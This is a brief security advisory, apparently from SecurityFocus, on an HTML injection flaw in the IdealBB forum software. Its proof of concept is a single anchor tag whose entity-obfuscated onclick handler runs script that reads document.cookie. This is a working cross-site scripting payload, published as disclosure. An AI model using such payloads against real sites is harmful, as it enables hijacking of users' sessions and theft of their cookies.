IdealBB HTML Injection Vulnerability

The following proof of concept was provided by Scott M <scottm@spamcop.net>:

<a href="http://www.google.com" onclick="j&#97;vascript:alert(do&#99;ument.cookie);">Google</a>


 

Privacy Statement
Copyright 2010, SecurityFocus